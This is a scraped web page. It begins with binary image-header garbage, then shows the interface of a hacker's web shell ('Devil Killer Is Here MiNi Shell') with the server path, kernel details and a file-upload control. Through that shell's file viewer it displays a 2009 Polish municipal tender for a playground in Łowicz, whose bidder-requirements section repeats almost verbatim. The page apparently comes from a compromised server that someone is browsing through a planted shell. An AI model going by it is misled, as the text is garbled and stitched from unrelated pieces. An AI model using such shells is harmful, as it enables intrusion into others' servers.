JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090811/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090811/131517-N-2009.html

<p class="kh_header"><b>Łowicz: Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na dostawie i montażu metalowych urządzeń zabawowych dla dzieci na plac zabaw przy ulicy Miodowej i Mickiewicza w Łowiczu</b><br>
<b>Numer ogłoszenia: 131517 - 2009; data zamieszczenia: 11.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Łowiczu , Stary Rynek 1, 99-400 Łowicz, woj. łódzkie, tel. 046 830-91-51, faks 046 830-91-60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.um.lowicz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na dostawie i montażu metalowych urządzeń zabawowych dla dzieci na plac zabaw przy ulicy Miodowej i Mickiewicza w Łowiczu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na dostawie i montażu metalowych urządzeń zabawowych dla dzieci na plac zabaw przy ulicy Miodowej i Mickiewicza w Łowiczu o następujących parametrach technicznych:

a) huśtawka podwójna wahadłowa stalowa, podpory z rur stalowych o Omin. 60 mm, belka z rury Omin 60 mm, łańcuch ze stali nierdzewnej atestowany, huśtawka łożyskowana tocznie, siedziska gumowane z poręczą stałą, - maksymalne wymiary długość 3 metry, wysokość do 2,0 metra, szerokość do 1,4 metra.
b) huśtawka podwójna wahadłowa stalowa, podpory z rur stalowych o Omin. 60 mm, belka z rury Omin 60 mm, łańcuch ze stali nierdzewnej atestowany, huśtawka łożyskowana tocznie, siedzisko - deseczka gumowana. - maksymalne wymiary długość 3 metry, wysokość do 2,0 metra, szerokość do 1,4 metra.
c)huśtawka wagowa - belka z rury Omin 60 mm, podpory z rury Omin 48 mm, huśtawka łożyskowana tocznie, siedziska gumowane, uchwyty ze stali nierdzewnej, amortyzatory gumowe pod siedziskami - maksymalne wymiary długość do 2,0 metra, szerokość do 0,55 metra, wysokość do 0,7 metra.
d) karuzela czteroramienna - konstrukcja ramion i słupa z rury Omin 75 mm, siedzisko gumowane i atestowane, karuzela łożyskowana tocznie, - maksymalne wymiary długość do 2,0 metra, szerokość do 1,9  metra, wysokość do 0,7 metra.
e) zjeżdżalnia - konstrukcja z profilu zamkniętego o wymiarach minimalnych 40x40 mm, ześlizg z blacy nierdzewnej wygłuszony płytą, schody wykonane z drewna (antypoślizgowe), wypełnienie ze sklejki wodoodpornej o grubości mim 10 mm, - maksymalne wymiary długość do 4,5 metra, szerokość do 0,9 metra, wysokość do podestu  do 1,6  metra.
f) zjeżdżalnia - konstrukcja z profilu o grubości min 60 x 60 mm, ześlizg ze stali nierdzewnej z płytą wygłuszającą, dach i wypełnienie ze sklejki wodoodpornej o grubości minimum 10 mm, podłoga ze sklejki atypoślizgowej o grubości minimum 20 mm. - maksymalne wymiary długość do 3,5 metra, szerokość do 0,9 metra, wysokość do podestu do 1,2  metra.
g)piaskownica (wraz z piaskiem) - konstrukcja ze sklejki wodoodpornej o grubości minimum 18 mm - maksymalne wymiary piaskownicy to 4 x 4 metry
h) ławka z oparciem ( dł. 2,0 metra) - konstrukcja z kątownika o wymiarach minimalnych 35x35 mm, deski drewniane o wymiarach minimalnych 35x100x2000
i) słupki do siatkówki (wraz z siatką) - słupki z rury stalowej Omin 108 mm cynkowane ogniowo, kółka naciągu chromowane.
j) bramka stalowa o wymiarach 2 x 3 metra ( z siatką) - konstrukcja z rury Omin 88 mm, stelaż siatki z rury Omin 33 mm
k) kosz na śmieci  - opróżnianie kosza po zwolnieniu zamka poprzez obrót, po opróżnieniu samoczynnie powraca do pionu.
l) regulamin placu zabaw - tablica z blachy ocynkowanej o grubości minimalnej 0,8 mm
ł) ogrodzenie placu zabaw z paneli zgrzewanych z pręta O  5 mm, ocynkowanych i powlekanych powłoka polimerową wraz z dwiema furtkami (1000 x 1000 mm) i bramą dwuskrzydłową (1000 x 2000 mm), montaż na wylewkach betonowych, wysokość ogrodzenia minimum 1 metr,
m) wykonanie piłkochwytu (ogrodzenia) z siatki stalowej ocynkowanej o grubości drutu 3,2 mm wysokości minimum 4 metry, i profili stalowych ocynkowanych 80x80x3 mm , wraz z trzema furtkami z zamknięciem  
n) wykonanie niezbędnych prac ziemnych - wyrównanie terenu

-Wykonawca załączy zdjęcia, schematy lub inne rysunki poglądowe i rzuty  wszystkich urządzeń i zestawów zabawowych zaproponowanych w ofercie,
-urządzenia będą tak zamontowane, aby zapewniały utrzymanie stref  bezpieczeństwa,
-	łożyska huśtawek samosmarujące, zabezpieczone smarem,
-	urządzenia zabawowe muszą być pomalowane farbami nietoksycznymi (kolor do   ustalenia z inwestorem przed montażem zabawek)
-	łańcuchy huśtawek ze stali kwasoodpornej, nierdzewnej,
-	śruby mocujące ocynkowane, nierdzewne,
-	miejsca łączenia zabezpieczone zaślepkami,
-	elementy konstrukcyjne urządzeń mocowane w fundamentach za pośrednictwem elementów stalowych, ocynkowanych,
-	fundamenty z betonu B15,
-	zachowanie wymaganych stref bezpieczeństwa dla poszczególnych urządzeń,
-	głębokość i wielkość fundamentów winna być zgodna z normami budowlanymi
i winna zapewnić stabilność konstrukcji,
-	podczas montażu Wykonawca będzie unikać szkodliwych działań dla środowiska, a przede wszystkim emitowania nadmiernego hałasu,
-	wszystkie montowane wyroby muszą być zgodne z normami PN - EN 1177 
i PN - EN 1176 , PN-EN 509, 748, 749, 1270
-	Wykonawca wykona przegląd (0) placu zabaw (przez osobę uprawnioną w obecności przedstawicieli Zamawiajacego), dostarczy Zamawiającemu wszystkie niezbędne atesty i certyfikaty na zamontowane urządzenia zabawowe, sportowe, ogrodzenie, itp.
-	Wykonawca wykona inwentaryzację geodezyjną wykonanego placu zabaw.
-	oferenci dokonają wizji lokalnej w terenie, gdzie będą realizowane roboty będące przedmiotem zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1500,00 zł  (słownie :tysiąc pięćset  złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się  Wykonawcy, którzy spełniają wymagania opisane w
art. 22 ust.1 Ustawy t.j.:
a)  posiadają uprawnienia do wykonywania  działalności określonej przedmiotem zamówienia ,
b)  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do  wykonania zamówienia, 
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia z powodów wymienionych 
w art. 24 Ustawy,
e) złożą w wymaganym terminie kompletną pisemną ofertę na formularzu ofertowym, zgodnie ze SIWZ,
f)  wniosą  wadium zgodnie z zapisami w SIWZ,
d) wyrażą zgodę na realizację faktur za wykonanie przedmiotu umowy w terminie 30 dni od daty  ich otrzymania przez Zamawiającego na podstawie odpowiednio częściowych protokołów robót i końcowego bezusterkowego protokołu odbioru robót, 
i) udzielą gwarancji na wykonany przedmiot zamówienia na okres nie krótszy niż 48 miesięcy.

     Wykonawcą może być osoba fizyczna, osoba prawna lub jednostka organizacyjna nieposiadająca osobowości prawnej oraz podmioty te występujące wspólnie, o ile spełniają warunki określone w Ustawie oraz niniejszej specyfikacji.
	Wykonawcy występujący wspólnie (spółki cywilne, konsorcja) ponoszą solidarną odpowiedzialność za wykonanie zamówienia.
Wykonawcy wspólnie ubiegający się o udzielenie mniejszego zamówienia muszą wykazać, że łącznie spełniają warunki  określone w pkt. 5.1 lit. a-c. Warunek określony w pkt. 5.1 lit. d musi spełniać każdy Wykonawca.
Opis sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu.
a) Ocena ofert w zakresie spełniania warunków udziału w postępowaniu będzie oparta na ocenie spełniania przez nich wszystkich kryteriów określonych w niniejszej SIWZ na zasadzie spełnia  nie spełnia tzn. każdy z wykonawców musi spełniać wszystkie enumeratywnie wymienione warunki pod rygorem odrzucenia oferty lub wykluczenia oferenta.
b) Sposób przeprowadzenia postępowania o udzielenie zamówienia określa regulamin  komisji przetargowej powołanej do przygotowania i przeprowadzenia przedmiotowego postępowania.

Wykaz oświadczeń i dokumentów jakie mają dostarczyć wykonawcy  w celu potwierdzenia  
spełniania warunków udziału w postępowaniu.
a) Oświadczenie-  wykaz osób, którymi dysponuje lub będzie dysponować  Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, zdolnymi do wykonania zamówienia 
b) oświadczenie o posiadaniu uprawnień do występowania w obrocie prawnym w zakresie zamówienia, 
c) oświadczenie o posiadaniu niezbędnej wiedzy i doświadczenia oraz dysponowaniu potencjałem      technicznym i  osobami zdolnymi do wykonania zamówienia, 
d) oświadczenie że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
e) oświadczenia, że wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia z             powodów wymienionych w art. 24 ust. 1 i 2 Ustawy. 
f) oświadczenie iż wyraża zgodę na wypłatę przez Zamawiającego wynagrodzenia za wykonany przedmiot umowy na podstawie jednej faktury po wykonaniu 100% zakresu rzeczowego przedmiotu zamówienia, ich odbiorze na podstawie końcowego bezusterkowego protokołu odbioru robót, podpisanego przez Inspektora Nadzoru Inwestorskiego i Zamawiającego,
g) oświadczenie iż wyraża zgodę na realizację faktur za wykonane roboty w terminie 30 dni od daty  ich  otrzymania przez Zamawiającego, 
h) oświadczenie, że wykonawca zapoznał się i przyjmuje bez zastrzeżeń do realizacji warunki specyfikacji i akceptuje projekt umowy stanowiący załącznik do SIWZ i zobowiązuje się do zawarcia umowy na wymienionych w niej warunkach,
i) oświadczenie o zobowiązaniu się do wpłacenia wniesienia zabezpieczenia należytego wykonania  umowy o równowartości  5 %  ceny ofertowej brutto, w przypadku wybrania oferty przez Zamawiającego oraz wstępne określenie formy w jakiej to zabezpieczenie zostanie  wniesione  (podać formę) ,
j) wypełniony i podpisany kosztorys ofertowy wykonany na podstawie dostarczonego przez  Zamawiającego przedmiaru robót (uproszczony),
k) oświadczenie - informacja na temat przeciętnej liczby zatrudnionych pracowników oraz liczebności personelu kierowniczego, w okresie ostatnich trzech lat, a w przypadku gdy okres prowadzenia działalności jest krótszy -w tym okresie,
l) oświadczenie-wykaz niezbędnych do wykonania zamówienia urządzeń i narzędzi jakimi dysponuje wykonawca,
m) oświadczenie - wykaz osób (podmiotów) z podaniem nazw firm, które będą wykonywać zamówienie wraz z informacjami na temat kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich częściach zamówienia, których wykonanie zamierza powierzyć podwykonawcy/om, chyba że całość przedmiotu zamówienia Wykonawca będzie wykonywał we własnym zakresie.
n) oświadczenie wykaz że wykonali w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,                    2 roboty ogólno budowlane  kwotę brutto 100 000,00 zł każda, oraz przedstawią dokumenty (referencje) potwierdzające, że roboty te zostały wykonane należycie
o)oświadczenie o okresie udzielonej gwarancji na wykonany przedmiot zamówienia na okres nie krótszy niż 48 miesięcy,
p) oświadczenie, że wykonawca nie zalega z opłacaniem  podatków, opłat oraz składek na ubezpieczenie społeczne,
Zamawiający żąda pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia jeżeli w wykazie, o którym mowa powyżej, Wykonawca wskazał osoby, którymi będzie dysponował.
W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia,  dokument wymieniony w pkt. 1. a  powinien przedłożyć ten lub ci spośród wykonawców, którzy potwierdzają spełnienie warunku.
Wykaz dokumentów
a) aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed terminem składania ofert,     
b) w przypadku spółki cywilnej lub konsorcjum każdy ze wspólników (konsorcjantów) składa dodatkowo:
- wykaz wspólników lub konsorcjantów ubiegających się o udzielenie zamówienia,
- pełnomocnictwo udzielone jednemu ze wspólników lub konsorcjantów lub innej osobie do reprezentowania ich w przetargu lub reprezentowania ich w przetargu i zawarcia umowy.
Przed podpisaniem umowy wspólnicy spółki cywilnej lub konsorcjanci okażą Zamawiającemu umowę spółki cywilnej lub konsorcjum określającą wzajemne prawa i obowiązki stron i regulującą ich współpracę.
c) sprawozdanie finansowe albo jego część a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu lub jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty, oraz zobowiązania i należności - za okres ostatnich 3 lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres,
d) polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od        odpowiedzialności cywilnej (ubezpieczenie kontraktowe i deliktowe) w zakresie prowadzonej         działalności gospodarczej -zgodnego z przedmiotem niniejszego zamówienia w wysokości nie mniejszej  niż 100 000,00 zł (słownie: sto  tysięcy złotych). Ważność polisy musi obejmować cały okres realizacji zadania. 
e)Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów, o których mowa wyżej, składa dokumenty lub oświadczenia szczegółowo określone w §2  Rozporządzenia  Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy oraz form w jakich te dokumenty mogą być składane     (Dz.U. Nr 87, poz.605 i Dz. U. z 2008 r, Nr 188, poz. 1155 ).
   Kopie dokumentów winny być poświadczone za zgodność z oryginałem przez  Wykonawcę - zgodnie z formą reprezentacji określoną w rejestrze handlowym, kodeksie cywilnym lub w gminnej ewidencji działalności gospodarczej i opatrzone datą potwierdzenia.
   Złożenie przez oferenta fałszywych lub stwierdzających nieprawdę dokumentów jest karalne. Zgodnie z   art. 24 ust. 2 pkt. 2 ustawy wykonawca, który złożył nieprawdziwe informacje mające wpływ na wynik postępowania zostaje wykluczony z postępowania. Gdy fakt podania  nieprawdziwych informacji wyjdzie  na jaw po zawarciu umowy - umowa taka jest  nieważna z mocy prawa.
     W przypadku spółki cywilnej lub konsorcjum wymaga się dostarczenia dokumentów wymienionych  w pkt.  a), e) , f),  g),  złożonych przez każdego wspólnika lub  konsorcjanta  z  osobna.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> O udzielenie zamówienia mogą ubiegać się  Wykonawcy, którzy spełniają wymagania opisane w
art. 22 ust.1 Ustawy t.j.:
a)  posiadają uprawnienia do wykonywania  działalności określonej przedmiotem zamówienia ,
b)  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do  wykonania zamówienia, 
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia z powodów wymienionych 
w art. 24 Ustawy,
e) złożą w wymaganym terminie kompletną pisemną ofertę na formularzu ofertowym, zgodnie ze SIWZ,
f)  wniosą  wadium zgodnie z zapisami w SIWZ,
d) wyrażą zgodę na realizację faktur za wykonanie przedmiotu umowy w terminie 30 dni od daty  ich otrzymania przez Zamawiającego na podstawie odpowiednio częściowych protokołów robót i końcowego bezusterkowego protokołu odbioru robót, 
i) udzielą gwarancji na wykonany przedmiot zamówienia na okres nie krótszy niż 48 miesięcy.

     Wykonawcą może być osoba fizyczna, osoba prawna lub jednostka organizacyjna nieposiadająca osobowości prawnej oraz podmioty te występujące wspólnie, o ile spełniają warunki określone w Ustawie oraz niniejszej specyfikacji.
	Wykonawcy występujący wspólnie (spółki cywilne, konsorcja) ponoszą solidarną odpowiedzialność za wykonanie zamówienia.
Wykonawcy wspólnie ubiegający się o udzielenie mniejszego zamówienia muszą wykazać, że łącznie spełniają warunki  określone w pkt. 5.1 lit. a-c. Warunek określony w pkt. 5.1 lit. d musi spełniać każdy Wykonawca.
Opis sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu.
a) Ocena ofert w zakresie spełniania warunków udziału w postępowaniu będzie oparta na ocenie spełniania przez nich wszystkich kryteriów określonych w niniejszej SIWZ na zasadzie spełnia  nie spełnia tzn. każdy z wykonawców musi spełniać wszystkie enumeratywnie wymienione warunki pod rygorem odrzucenia oferty lub wykluczenia oferenta.
b) Sposób przeprowadzenia postępowania o udzielenie zamówienia określa regulamin  komisji przetargowej powołanej do przygotowania i przeprowadzenia przedmiotowego postępowania.

Wykaz oświadczeń i dokumentów jakie mają dostarczyć wykonawcy  w celu potwierdzenia  
spełniania warunków udziału w postępowaniu.
a) Oświadczenie-  wykaz osób, którymi dysponuje lub będzie dysponować  Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, zdolnymi do wykonania zamówienia 
b) oświadczenie o posiadaniu uprawnień do występowania w obrocie prawnym w zakresie zamówienia, 
c) oświadczenie o posiadaniu niezbędnej wiedzy i doświadczenia oraz dysponowaniu potencjałem      technicznym i  osobami zdolnymi do wykonania zamówienia, 
d) oświadczenie że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
e) oświadczenia, że wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia z             powodów wymienionych w art. 24 ust. 1 i 2 Ustawy. 
f) oświadczenie iż wyraża zgodę na wypłatę przez Zamawiającego wynagrodzenia za wykonany przedmiot umowy na podstawie jednej faktury po wykonaniu 100% zakresu rzeczowego przedmiotu zamówienia, ich odbiorze na podstawie końcowego bezusterkowego protokołu odbioru robót, podpisanego przez Inspektora Nadzoru Inwestorskiego i Zamawiającego,
g) oświadczenie iż wyraża zgodę na realizację faktur za wykonane roboty w terminie 30 dni od daty  ich  otrzymania przez Zamawiającego, 
h) oświadczenie, że wykonawca zapoznał się i przyjmuje bez zastrzeżeń do realizacji warunki specyfikacji i akceptuje projekt umowy stanowiący załącznik do SIWZ i zobowiązuje się do zawarcia umowy na wymienionych w niej warunkach,
i) oświadczenie o zobowiązaniu się do wpłacenia wniesienia zabezpieczenia należytego wykonania  umowy o równowartości  5 %  ceny ofertowej brutto, w przypadku wybrania oferty przez Zamawiającego oraz wstępne określenie formy w jakiej to zabezpieczenie zostanie  wniesione  (podać formę) ,
j) wypełniony i podpisany kosztorys ofertowy wykonany na podstawie dostarczonego przez  Zamawiającego przedmiaru robót (uproszczony),
k) oświadczenie - informacja na temat przeciętnej liczby zatrudnionych pracowników oraz liczebności personelu kierowniczego, w okresie ostatnich trzech lat, a w przypadku gdy okres prowadzenia działalności jest krótszy -w tym okresie,
l) oświadczenie-wykaz niezbędnych do wykonania zamówienia urządzeń i narzędzi jakimi dysponuje wykonawca,
m) oświadczenie - wykaz osób (podmiotów) z podaniem nazw firm, które będą wykonywać zamówienie wraz z informacjami na temat kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich częściach zamówienia, których wykonanie zamierza powierzyć podwykonawcy/om, chyba że całość przedmiotu zamówienia Wykonawca będzie wykonywał we własnym zakresie.
n) oświadczenie wykaz że wykonali w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,                    2 roboty ogólno budowlane  kwotę brutto 100 000,00 zł każda, oraz przedstawią dokumenty (referencje) potwierdzające, że roboty te zostały wykonane należycie
o)oświadczenie o okresie udzielonej gwarancji na wykonany przedmiot zamówienia na okres nie krótszy niż 48 miesięcy,
p) oświadczenie, że wykonawca nie zalega z opłacaniem  podatków, opłat oraz składek na ubezpieczenie społeczne,
Zamawiający żąda pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia jeżeli w wykazie, o którym mowa powyżej, Wykonawca wskazał osoby, którymi będzie dysponował.
W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia,  dokument wymieniony w pkt. 1. a  powinien przedłożyć ten lub ci spośród wykonawców, którzy potwierdzają spełnienie warunku.
Wykaz dokumentów
a) aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed terminem składania ofert,     
b) w przypadku spółki cywilnej lub konsorcjum każdy ze wspólników (konsorcjantów) składa dodatkowo:
- wykaz wspólników lub konsorcjantów ubiegających się o udzielenie zamówienia,
- pełnomocnictwo udzielone jednemu ze wspólników lub konsorcjantów lub innej osobie do reprezentowania ich w przetargu lub reprezentowania ich w przetargu i zawarcia umowy.
Przed podpisaniem umowy wspólnicy spółki cywilnej lub konsorcjanci okażą Zamawiającemu umowę spółki cywilnej lub konsorcjum określającą wzajemne prawa i obowiązki stron i regulującą ich współpracę.
c) sprawozdanie finansowe albo jego część a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu lub jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty, oraz zobowiązania i należności - za okres ostatnich 3 lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres,
d) polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od        odpowiedzialności cywilnej (ubezpieczenie kontraktowe i deliktowe) w zakresie prowadzonej         działalności gospodarczej -zgodnego z przedmiotem niniejszego zamówienia w wysokości nie mniejszej  niż 100 000,00 zł (słownie: sto  tysięcy złotych). Ważność polisy musi obejmować cały okres realizacji zadania. 
e)Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów, o których mowa wyżej, składa dokumenty lub oświadczenia szczegółowo określone w §2  Rozporządzenia  Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy oraz form w jakich te dokumenty mogą być składane     (Dz.U. Nr 87, poz.605 i Dz. U. z 2008 r, Nr 188, poz. 1155 ).
